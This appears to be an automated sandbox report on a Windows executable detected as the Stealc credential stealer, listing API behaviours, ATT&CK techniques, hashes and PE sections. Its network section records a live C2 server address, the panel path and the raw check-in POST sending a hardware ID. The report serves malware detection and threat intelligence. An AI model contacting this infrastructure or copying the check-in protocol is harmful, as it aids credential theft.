                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BE9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE9AA0 mov eax, dword ptr fs:[00000030h]0_2_00BE9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00BE7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6316, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00BE9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00BE98E0
                Source: file.exe, file.exe, 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: )Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C17588 cpuid 0_2_00C17588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00BE7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE6BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00BE6BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00BE79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00BE7BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.bd0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1704510962.0000000005610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6316, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.bd0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1704510962.0000000005610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6316, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.php-Sfile.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.php.file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.206/wsfile.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/6c4adf523b719729.phpQSfile.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/$file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1543417
                                  Start date and time:2024-10-27 20:14:11 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 27s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:1
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 129
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.206file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  wo4POc0NG1.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/
                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  wo4POc0NG1.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.16
                                  r9gBM4l6Ip.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.43
                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  0j6nSbUQQS.dllGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.217
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.957581879098783
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:2'151'424 bytes
                                  MD5:87f5c5f97ee636b82e53d3f3acb6ed2b
                                  SHA1:3aeeb3e7a4ca578ffbbe685c88ae689f141ee68d
                                  SHA256:0de3e0a7d01986ca6a969204c0dfb41fc50e24c992694ee629508e913643246c
                                  SHA512:abfbc8b048f3dca7eb88a5c3f3df76de83244fdacb93870ccf7931947f60b5efa2587c85a92199415c373b32fb0a289b9cdefa511983e2f3724758cec51a15ab
                                  SSDEEP:49152:QWR6WOM93YclfVB2lLn7+HeNzhe1YjN+WFpL3WtT7kYdzSOwl:RqcfLeH+HeRtN+6asYRv
                                  TLSH:36A533AB19DB909DCC9E8A7C9DC355AFF4F7BB596DD80842AC496D3024728A5CCDC20C
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                  File Icon

                                  Icon Hash:90cececece8e8eb0

                                  Static PE Info

                                  General

                                  Entrypoint:0xb38000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F0640EDEB6Ah
                                  lss esp, dword ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], cl
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 0Ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x2e70000x6760063be2e53f80867f1448abb19dc233e41unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x2ea0000x2aa0000x200eb16b173399a1140e88df82f4a2ed475unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  pbjioyes0x5940000x1a30000x1a24003b1b42b291c45e2e370950eaac0f5906False0.9948463417139869data7.95363539760933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  xrzszivt0x7370000x10000x4005aaf905d516c3f35e6b8a4a496ddb086False0.7509765625data5.931086746101504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x7380000x30000x2200cf4597ac053a9b3bbe5bd2b23b7b63a2False0.06135110294117647DOS executable (COM)0.7853712716311377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-10-27T20:15:10.393892+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 27, 2024 20:15:08.153490067 CET4973080192.168.2.4185.215.113.206
                                  Oct 27, 2024 20:15:08.159145117 CET8049730185.215.113.206192.168.2.4
                                  Oct 27, 2024 20:15:08.159264088 CET4973080192.168.2.4185.215.113.206
                                  Oct 27, 2024 20:15:08.159451962 CET4973080192.168.2.4185.215.113.206
                                  Oct 27, 2024 20:15:08.164764881 CET8049730185.215.113.206192.168.2.4
                                  Oct 27, 2024 20:15:10.098999023 CET8049730185.215.113.206192.168.2.4
                                  Oct 27, 2024 20:15:10.099236012 CET4973080192.168.2.4185.215.113.206
                                  Oct 27, 2024 20:15:10.100213051 CET8049730185.215.113.206192.168.2.4
                                  Oct 27, 2024 20:15:10.100295067 CET4973080192.168.2.4185.215.113.206
                                  Oct 27, 2024 20:15:10.100501060 CET8049730185.215.113.206192.168.2.4
                                  Oct 27, 2024 20:15:10.100599051 CET4973080192.168.2.4185.215.113.206
                                  Oct 27, 2024 20:15:10.100902081 CET8049730185.215.113.206192.168.2.4
                                  Oct 27, 2024 20:15:10.100970030 CET4973080192.168.2.4185.215.113.206
                                  Oct 27, 2024 20:15:10.103249073 CET4973080192.168.2.4185.215.113.206
                                  Oct 27, 2024 20:15:10.108639002 CET8049730185.215.113.206192.168.2.4
                                  Oct 27, 2024 20:15:10.393790960 CET8049730185.215.113.206192.168.2.4
                                  Oct 27, 2024 20:15:10.393892050 CET4973080192.168.2.4185.215.113.206
                                  Oct 27, 2024 20:15:12.764826059 CET4973080192.168.2.4185.215.113.206

                                  HTTP Request Dependency Graph

                                  • 185.215.113.206

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449730185.215.113.206806316C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 27, 2024 20:15:08.159451962 CET90OUTGET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Oct 27, 2024 20:15:10.098999023 CET203INHTTP/1.1 200 OK
                                  Date: Sun, 27 Oct 2024 19:15:08 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Oct 27, 2024 20:15:10.100213051 CET203INHTTP/1.1 200 OK
                                  Date: Sun, 27 Oct 2024 19:15:08 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Oct 27, 2024 20:15:10.100501060 CET203INHTTP/1.1 200 OK
                                  Date: Sun, 27 Oct 2024 19:15:08 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Oct 27, 2024 20:15:10.100902081 CET203INHTTP/1.1 200 OK
                                  Date: Sun, 27 Oct 2024 19:15:08 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Oct 27, 2024 20:15:10.103249073 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAK
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 42 45 39 32 42 44 32 46 43 45 32 39 31 34 36 34 38 33 37 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 2d 2d 0d 0a
                                  Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="hwid"8BBE92BD2FCE2914648374------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="build"tale------HCFIIIJJKJKFHIDGDBAK--
                                  Oct 27, 2024 20:15:10.393790960 CET210INHTTP/1.1 200 OK
                                  Date: Sun, 27 Oct 2024 19:15:10 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:15:15:03
                                  Start date:27/10/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0xbd0000
                                  File size:2'151'424 bytes
                                  MD5 hash:87F5C5F97EE636B82E53D3F3ACB6ED2B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1704510962.0000000005610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:3.2%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:3.5%
                                    Total number of Nodes:1327
                                    Total number of Limit Nodes:24
